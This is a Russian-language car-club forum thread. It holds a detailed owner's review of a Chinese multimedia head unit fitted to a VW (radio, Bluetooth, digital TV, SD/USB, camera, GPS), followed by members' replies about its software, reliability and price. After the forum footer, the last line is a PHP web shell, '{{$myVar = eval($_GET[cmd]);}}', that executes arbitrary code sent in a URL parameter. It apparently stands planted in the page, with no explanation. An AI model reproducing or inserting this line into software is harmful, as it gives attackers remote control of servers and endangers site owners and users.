+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 49

Тема: Мультимедийный АПЕЛЬСИН! Или новая голова лучше старых двух! :)


  1. #1

    Мультимедийный АПЕЛЬСИН! Или новая голова лучше старых двух! :)

    Статья была написана 2 месяца назад, но только сейчас дошли руки
    все это отредактировать и выложить фотоотчёт!
    Не судите строго! ) Зато хватило время все оттестировать и опробовать!

    И так друзья, 3-й день подряд я не могу покинуть свой автомобиль, я забыл про ноутбук и про КПК с GPS я забыл про диски с музыкой и домашний телевизор, я забыл про мп3 плеер свой iPhone и все остальное, В МОЕЙ МАШИНЕ ПОЯВИЛСЯ МУЛЬТИМЕДИЙНЫЙ ЦЕНТР!!!! НАКОНЕЦТО! То чего я так долго ждал!!! Теперь все что душе угодно из мира развлечений, есть в МОЕЙ МАШИНЕ!!!

    Разрешите представить НОВОЕ ГОЛОВНОЕ МУЛЬТИМЕДИЙНОЕ УСТРОЙСТВО ДЛЯ АВТОМОБИЛЯ: YURSON!



    Немного истории: очень давно я сотрудничаю по виду своей деятельности с людьми которые поставляют электронику из Китая! Зная, о нашем клубе и моих увлечениях автомобилями они предложили мне таскать из Китая магнитолы для наших машин, которые позиционируются как подделки оригиналов! Я смотрел на это все со стороны, и не решался никак попробовать, чем они хороши или плохи. В общем как оказалось, по началу они были очень некачественные, и многие об этом могут знать, это были устройства типа ФАНТОМ! Сам их не видел, но слышал не очень позитивные отзывы! Так бы мы и оставили эту тему, если бы пару недель назад, мои партнёры не обрадовали меня хорошей новостью: "ФОРС, тебе на это стоит посмотреть, мы нашли в Китае где делают точные копии ОРИГИНАЛЬНЫХ головных устройств для разных марок автомобилей, в том числе и для VW! Везем первую партию! Очень рассчитываем на твою поддержку и помощь в продвижении данного продукта на нашем рынке! Это уже не то ГОВНО что было раньше, это действительно стоящий продукт!" - сказали они, "Ну хорошо, посмотрим, везите" - сказал Я, сильно не надеясь на что-то качественное и стоящее того, что бы возглавлять развлекалово в моем апельсине...

    Я уже год как собираюсь собрать внутри машины, полноценный компьютер! Купил сенсорный экран на 7", специальный блок управления автомобильным питанием для материнской платы, самую маленькую материнскую плату размером с пол листа А4 с процессором ATOM и т.д. Но все собрать в кучу никак не хватает времени, да и как оно все будет функционировать тоже пока только в мыслях остается! Но вот пришли холода, появилось больше свободного времени на выходных! Мой старый знакомый который профессионально разбирается и занимается установкой музыки, сказал что уже пора мне ставить мощную систему! Ну в общем все сложилось таким образом, что я подумал, а не взять ли на тесты ЭТО УСТРОЙСТВО, которое должны притащить мои поставщики, и не попробовать ли как и что, вдруг не надо будет и комп собирать!

    В общем на выходных, поехал я за этой чудо штукой, условно назовем ее «магнитолой» :) Забрал, + прихватил на тесты 3 камеры заднего вида, и поехал в гаражи к другу на установку этого всего барахла! ТО ЧТО творилось дальше в подробном отчёте:

    1. Распечатав коробку я обнаружил (на удивление, со всеми китайскими устройствами) полный комплект всего, что может понадобиться! Полнейший комплект в котором предусмотрено ВСЕ!!! Все аккуратно упаковано по кулёчкам, все герметично, красиво, и все понятно! Полностью все необходимые кабеля для подключения, антенна для цифрового ТВ, переходники для подключения к штатной системе, выносной GPS модуль, кабель для подключения USB, кабель для подключения к iPod, ПДУ с батарейкой и куча еще всяких приятных мелочей! Даже карту памяти на 1GB положили!!!





    Ну что же, хм... ЭТО ПЕРВЫЙ ПЛЮС, приятно удивили китайцы - подумал я и достал все из коробки! Быстренько разобрав центральную часть торпеды (благо не впервой, опыт есть... если кому надо могу подробно написать что за чем откручивается и вынимается) я выкинул ящичек для мелочей, и старую одно-диновую магнитолу SONY!

    Самый огромнейший ПЛЮС данного устройства в том что оно идеально вписываться в торпеду, на место штатного! Ни малейших зазоров, все стык в стык! Ну грубо говоря это и есть штатное ОРИГИНАЛЬНОЕ устройство, только под другой торговой маркой!

    Установка его занимает около 5-ти минут, все ставиться на штатные места под штатные разъемы! А вот с подключением надо немного поморочится (тем у кого руки с правильного места растут) или доверить подключение профессионалам, которые БЕЗ ПРОБЛЕМ подключат за пол часа все к бортовой системе!







    Так же не стоит волноваться если у Вас управление на руле, все уже предусмотрено! Все будет работать! Необходимо только правильно подключиться к проводам!

    Итак магнитола подключена! УРА! Теперь можно начинать ТЕСТ!

    Второй огромнейший ПЛЮС, в том что в магнитоле стоит усилитель MOSFET, это 4x50Watt, те кто знает это одни из лучших, мощных усилков которые ставятся в брендовые магнитолы типа Pioneer и другие!

    Первые аккорды mp3, и я почувствовал сразу же разницу по сравнению со старой магнитолой! 2 штатные колонки заиграли так, что у меня было впечатление что мне добавили еще по 2 динамика на каждую дверь! Кто не верит послушаете на встрече!!! Я БЫЛ мягко говоря поражен... "может уже и не делать музыку, и этой вроде с головой хватает" - подумал Я, и отметил в голове второй плюсик :)

    Теперь перейдем к немаловажному описанию!



    Эргономика:
    Внизу 2 регулятора! Крутятся с маленькими щелчками как на ощупь, так и на звук (можно отключить звук), очень удобно, можно четко передвигаться на один шаг при повороте регулятора, а не плавать при точной настройке! Левая кнопка отвечает за включение выключение магнитолы (при длительном нажатии)! А во включенном состоянии за громкость! По-моему это лучшее решение в магнитолах, по сравнению с кнопками увеличения или уменьшения! Регулятор ФОРЕВА!!! Очень быстро и удобно можно накрутить громкость! Если нажать один раз на кнопку, то отключается звук полностью, очень удобно если надо мгновенно выключить звук, послушать если кто-то что-то говорит и сразу же его включить, повторным нажатием!

    Правый регулятор отвечает за серфинг по файлам (предыдущий или следующий) а также за переход по пунктам меню! В общем грубо говоря это те же стрелочки вправо-влево, только намного быстрее и удобнее! Так же нажатие его отвечает за множество функций, к примеру когда листаем списки, нажатием можно запустить выбранный файл! А когда воспроизводиться фильм, нажатием можно поставить на паузу!

    Есть спец клавиша "DIMM" - включение, выключение экрана! Очень удобно, когда хочешь слушать музыку, но не хочешь что бы свет от экрана утомлял глаза!

    Вверху возле слота для загрузки дисков есть клавиши влево вправо! Сделано для переключения треков, или фильмов, или других функций! Тоже очень удобно что бы не искать долго кнопки влево вправо на экране, они продублированы аппаратно!

    Есть отдельная кнопа eject - нажав на которую можно достать диск! :)

    Отдельная кнопка включения/выключения звука GPS навигатора!

    И кнопки которые расположены по краям экрана (8 штук) тоже довольно удобно отвечают за разные функции настройки и т.д.

    На лицевой панели: 2 слота для карт памяти SD, один для GPS, второй для мультимедиа + выход для кабеля iPod отдельно на лицевой панели! + USB шнур для подключения USB накопителей, который довольно длинный, и который можно завести в любое место, например в бардачок!

    Теперь рассмотрим начинку, или другими словами внутреннее ПО:

    Основное меню, сделано очень удобно, войдя в него можно одним нажатие запустить одно из нижеописанных действий:



    1. Радио!
    Радио реализовано на очень высоком уровне! От штатной антенны авто, прием великолепный! Управлять можно как кнопками на устройстве, так и кнопками на экране! Кнопкой RADIO переключаются списки FM1, FM2, FM3, AM! На экране отображаются:

    - частота радиостанции
    - название радиостанции и прочая техн.информация
    - порядковый номер радиостанции забитой в памяти
    - список ближайших радиостанций



    Выбирать радиостанции можно как на экране, клацая на конкретную волну, так и регулятором, непосредственно выбор радиостанции осуществляется нажатием на регулятор! На экране есть специальные клавиши для поиска след радиостанции по диапазону, или переход на 0,05 MHz вперед или назад, что очень удобно при точной настройке волны! Запоминание в память тоже удобное, достаточно накрутить необходимую волну, а потом на экране нажать и подержать цифру под номером которой захотим ее сохранить!

    На мой взгляд: управление реализовано великолепно, дизайн можно было бы и получше придумать! Хотя что можно требовать от радио... это всего лишь обычное радио :)

    2. Диск!
    Тут я долго не экспериментировал, так как на мой взгляд если есть флешка огромного объема, нафиг нужен этот диск! Но из того что я запускал на дисках все работало великолепно, и CD, и Mp3, и видеофильмы на DVD! Никаких претензий!



    3. iPod!
    В комплекте спец шнурок, соединяющий любой iPod с магнитолой! хоть у меня и iPhone но чет я не добрался до этой функции, обязательно попробую подключить на днях! :) Насколько я понимаю, можно любую инфу загрузить на экран прямо с iPod*а! :)

    4. Bluetooth!
    Вообще никаких вопросов не возникло! Отличный звук (тестировал не на ходу), думал будут проблемы с подключением через bluetooth моего яблока, но все оказалось просто! Нашел на айфоне устройство, головное, сопрядил их, и вперед! Можно принимать звонки, звонить, даже набирать номер на экране! И на сколько я видел, можно даже на экран загрузить телефонную книгу! О как! :)

    P.S. Протестировал на ходу, собеседник меня плохо слышит… надеюсь решить этот вопрос с помощью выносного микрофона!

    5. DTV (Цифровое телевиденье)
    Тут есть нюансы! Магнитолы есть как с аналоговым приемником ТВ сигнала, так и с цифровым! Первые стоят на порядок (150-200$) дешевле, но будущее за цифровой! По этому решено было взять цифру немного переплатив еще и за антенну которая идет в комплекте! Судья по тому что в Украине цифровое наземное вещается только в Киеве и в Одессе, то в Вышгороде у меня приема нет, пришлось тестировать в Киеве, и очень удачно! Ночью после клуба, смотрели сидели в машине ФОРМУЛУ! КВАЛИФИКАЦИЯ гранпри Бразилии!! Просто супер! Идеальная картинка и звук!! Народ был в восторге! На ходу до 30 км/час, картинка устойчивая, если скорость больше то картинка пропадает! Это Я так понял уже свойства самого процесса приема ТВ сигнала на всех устройствах! Вывод: в пробке и на шашлыках (стоянке) можно смотреть, на ходу увы :( Запасаемся любимыми фильмами! Управление переключением и поиском каналов реализовано не на высшем уровне, но привыкаешь достаточно быстро!

    6. Подключение CD чейнджера!
    Не пробовал, так как нету, да и не нужен он при такой коллосальной возможности читать карты памяти и USB устройства! Долой диски!!! :)

    7. SD карточка
    ООО Мое любимое! Даже только из за этой возможности Я готов оставить эту магнитолу! У меня карточка из старого GPS приемника на 4 гига! на ней куча музыки и клипов! Устройство ее быстро подхватило и запустило! При чем очень удобно, все открывается как в проводнике, можно шарится по папкам и запускать любые файлы, будь то музыка, фильмы или фотографии! Пишите что хотите, делайте папок сколько хотите! Серфинг по карте удобный и быстрый! Информация запускается моментально, без задержек!!! Супер!!! Тут твёрдая 5-ка!

    8. AUX IN
    не было возможности протестировать, но насколько я понял, можно подключить абсолютно любое устройство к системе и вывести звук на колонки!!! Список устройств ограничен только фантазией Юзера! :)

    9. Camera!
    К устройству подключаеться камера заднего вида! Шикарная картинка + в камеру встроен замер дальности до объекта! Получается 2 в одном, и камера, и парктроник :) Я выведу камеру на отдельное питание, дабы иметь в любое время возможность смотреть что творится под задним бампером )))

    + что не маловажно, в продаже имеются специальные камеры, которые монтируются в штатное гнездо, там где стоит лампа для подсветки номера (их у нас на машинах 2 штуки)! Очень удобно, и не надо сверлить лишних дырок!!! Все уже продумано!!! :) Камера даже с подсветкой!!! :)

    10. Скрытая функция USB
    Как оказалось от магнитолы еще отходит провод USB, не долго думаю я вставил туда USB флешку на 8 гиг и О ЧУДО!!!! открылся проводник, и информация отобразилась вся что на флешке!!! УРА!!!!!! ЭТО ЖЕ КАКИЕ ОБЪЕМЫ ИНФОРМАЦИИ можно подключить! И насколько удобно, вывести провод в бардачок (подальше от злых глаз) и подключать туда любые USB накопители! Взял дома написал на флешку что душе угодно, и слушай в машине, наслаждайся

    P.S. Самый главный вопрос который меня терзал и который я добил за все это время, это то что к магнитоле можно подключить любой ВНЕШНИЙ ВИНТ!!! 320Gb любимой музыки и всех фильмов!!! Что может быть лучше!!???

    11. GPS
    Модуль GPS выводиться под лобовое стекло отдельным шнуром, с самим приемником на конце! Сам приемник последнего поколения (обещает ловить даже в туннелях)! ПО крайней мере в Киеве прием очень устойчивый, и не сбивается!
    Функция GPS реализована с помощью отдельного слота под карточку SD! Который так и называется GPS CARD!
    Суть в том что на карточку можно загнать несколько карт, к примеру iGo, Визиком, Автоспутник и т.д., потом спец кнопкой на экране указать путь к экзешнику, например в папке iGo к файлу iGo.EXE и программа при запуске GPS навигатора сама будет грузить то что ей задали! Если надо переключиться на другую программу к примеру АВТОСПУТНИК, необходимо всего лишь изменить путь к файлу для запуска этой программы! Все это делается в 2 щелчка! По моему гениально придуманно!
    Самый большой ПЛЮС GPS навигатора, это то, что на него выведена отдельная кнопка, и то что он работает параллельно с остальными программами! Кнопкой переключается отображение между запущенной программой (к примеру РАДИО) и GPS картой! Очень удобно, не отрываясь от просмотра любимого фильма, нажал на кнопку быстренько глянул на карту нажал опять и дальше смотришь фильм! Так же есть отдельная кнопка которая включает или выключает голосовые подсказки навигатора при воспроизведении мультимедиа файлов! Что тоже очень удобно!

    Во всех воспроизведениях видео файлов, есть полезная функция перехода к нужному отрезку! Просто надо ввести точную минуту и секунду того момента на который вы хотите перейти, и вуаля!

    Экран
    Экран в магнитоле довольно хорошего качества! Во-первых он сенсорный, во вторых он почти семи дюймовый! Конечно качество не самое идеальное, но требовать большего за такие деньги я думаю просто глупо! На ярком солнце видны небольшие блики, и не со всех углов можно полностью увидеть изображение на экране! Но в сумеречную погоду, или в темное время суток, изображение шикарнейшее!!! Пикселей не видно, яркость достаточная, цветопередача отменная!!! Сенсор (настраиваемый) работает четко как ему и положено! Реагирует незамедлительно и точно! В целом по 5-ти бальной шкале за экран я бы поставил твердую 4-ку!

    В комплекте иметься ПДУ (так сказать ложка дегтя), но это больше для галочки чем для удобства! Пульт ужасно неудобный в плане дизайна, куча кнопок, в которых трудно разобраться и тем более закрытыми глазами найти нужную! Плюс ко всему, надо довольно точно целиться в приемник ИК сигнала, потому что чувствительность приемника слабая, надо точно направлять! Хотя если рука лежит на подлокотнике и в ней ПДУ, то довольно хорошо и без проблем можно им управлять!

    P.S. За 2 месяца я привык к пульту, без проблем когда рука лежит на подлокотнике, сигнал попадает точно в ИК приемник ) Дело привычки!

    Вот вроде и все что главного хотелось сказать об этом чудо устройстве! Надеюсь вскоре изобретут прошивки для ПО, которые позволят настраивать интерфейс устройства под себя, а так же помогут магнитоле читать русский язык!

    Вердикт: поскольку за 3 дня я уже не представляю свою жизнь в машине без этой магнитолы, однозначная 5-ка!!! Понятное дело есть пару недостатков, и минусов, но остальные плюсы с лихвой перекрывают все нюансы!

    Эпилог: ОДНОЗНАЧНО рекомендована всем одноклубникам, и друзьям на других автомобилях, как лучшая альтернатива полноценному автомобильному компьютеру, или самой навороченной магнитоле, за сравнительно (с оригинальной) небольшие деньги!


    Искренне Ваш, вечный оранжевый двигатель позитива, ФОРС

  2. #2
    II место Самый Интересный Автомобиль 2011 keeper is a jewel in the rough keeper is a jewel in the rough keeper is a jewel in the rough keeper is a jewel in the rough Аватар для keeper
    Регистрация
    17.09.2008
    Откуда
    Moscow
    Машина
    флай-цокотлай
    Сообщений
    2,049
    Реальные пацаны только за ориджинал,не в обиду дядь)
    два литра,автомат.

  3. #3
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Меня убивает софт в таких поделках.

    В интерфейс дополняет магнитолу, и благодаря этому ездишь всегда с включенным экраном.

    Первый и последний раз я посмотрел на такое чудо в машине шефа (он на круизер себе поставил) и было чувство, что китайцы просто для каждой функции магнитолы запускают отдельную программу и каждая со своим интерфейсом (а он на уровне конца 90х годов)

    Судя по скринам они далеко не ушли и в этом случае, да и на штатной управление проигрывателем поудобней будет)))

    Бывает либо качественно либо много, тут много всего)))

    Тоже не в обиду)))

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Мне нравиться )))) работа с SD тоже считаю, что на сегодняшний день самое полезное для обывателя.

    Форс, а Навител навигация встает ?
    Сколько стоит такое устройство и есть ли не под конкретные авто, а просто 2ДИН ?
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    II место Лучший Пилот клуба 2011 deflep will become famous soon enough Аватар для deflep
    Регистрация
    27.08.2007
    Откуда
    Москва
    Машина
    VW Golf MkV, 2007, BUB*Rotrex, DSG
    Сообщений
    1,613
    Работать этот девайс будет нормально. Комрады еще с начала осени на Пассате юзают. Но вот дружелюбность софта... эта ПЫНДЕЦ с большой буквы.

    ЗЫЖ Улыбнуло про ГПС антену и тоннели - кто такое обещал? Кому выслать в подарок губозакатывательную машинку? :)
    "Все что не умеет быстро ездить, обязательно должно красиво выглядеть"(с) я
    Wings for Life (c)
    A heart that hurts, Is a heart that... works.

  6. #6
    Цитата Сообщение от BON Посмотреть сообщение
    Мне нравиться )))) работа с SD тоже считаю, что на сегодняшний день самое полезное для обывателя.

    Форс, а Навител навигация встает ?
    Сколько стоит такое устройство и есть ли не под конкретные авто, а просто 2ДИН ?
    А что такое НАВИТЕЛ ?? Скинь я попробуй поставить.. потом скажу! Я iGo юзаю! :friends:

  7. #7
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    Была у меня китайщина) ) ) проработала 2 года, поломался двд проигрыватель, слушал флешку) в итоге толи от флешки толи от того что она кетай, стала произвольно включаться, утром придешь а у тебя музон качает в 6утра, думаешь вот мля..а акум уже умер, ищешь ктоб подкурить дал:)
    Недавно в первые морозы, 14 декабря, утром пришел а она сцуко опять играет, балалайка кетайская) ну пришлось тащить акум домой и заряжать, на работу не поехал:) потом опять произошла такая ситуевина, в итоге я пнул ее кулаком в монитор))) она улыбнулось трещиной во весь экран, после чего был куплен ЖИВИСИ 810 со съемной панелью, чем оч доволен, не сравнить ни с каким кетаем в принципе. Сугубо мое ИМХО.
    BMW 330D POWERED by Dizelboost :pepper:

  8. #8
    выглядит зашибись, но это управление китайское... просто жесть)
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  9. #9
    Цитата Сообщение от inVENTOr Посмотреть сообщение
    Была у меня китайщина) ) ) Сугубо мое ИМХО.
    Вот для этого я и вывел отдельный тумблер! уходишь с машины тумблер клацнул, и вся внешняя электроника обесточилась, что бы в режиме стендбай не поглощала на себя дорогую электроэнергию! :friends:За 900$ альтернативы реально не вижу!

  10. #10
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Вот для этого я и вывел отдельный тумблер! уходишь с машины тумблер клацнул, и вся внешняя электроника обесточилась, что бы в режиме стендбай не поглощала на себя дорогую электроэнергию! :friends:За 900$ альтернативы реально не вижу!
    есть у Марка рнска:)
    3d,5d gti, s3

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Новая голова
    от armor85 в разделе Барахолка
    Ответов: 5
    Последнее сообщение: 02.04.2024, 19:37
  2. Пропадает звук в двух колонках
    от Jahnglist3000 в разделе Авто Звук
    Ответов: 27
    Последнее сообщение: 02.04.2024, 15:16
  3. мультимедийный комплекс carmani ca-450
    от sixtynine в разделе Тюнинг
    Ответов: 3
    Последнее сообщение: 15.10.2013, 14:36
  4. С днем рождения, мой любимый АПЕЛЬСИН! :)
    от ФОРС в разделе Курилка
    Ответов: 10
    Последнее сообщение: 09.11.2010, 19:25
  5. Продаю Focus ST 07 (полосатый апельсин)
    от fsG в разделе Покупка и продажа авто
    Ответов: 6
    Последнее сообщение: 24.10.2009, 17:44

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}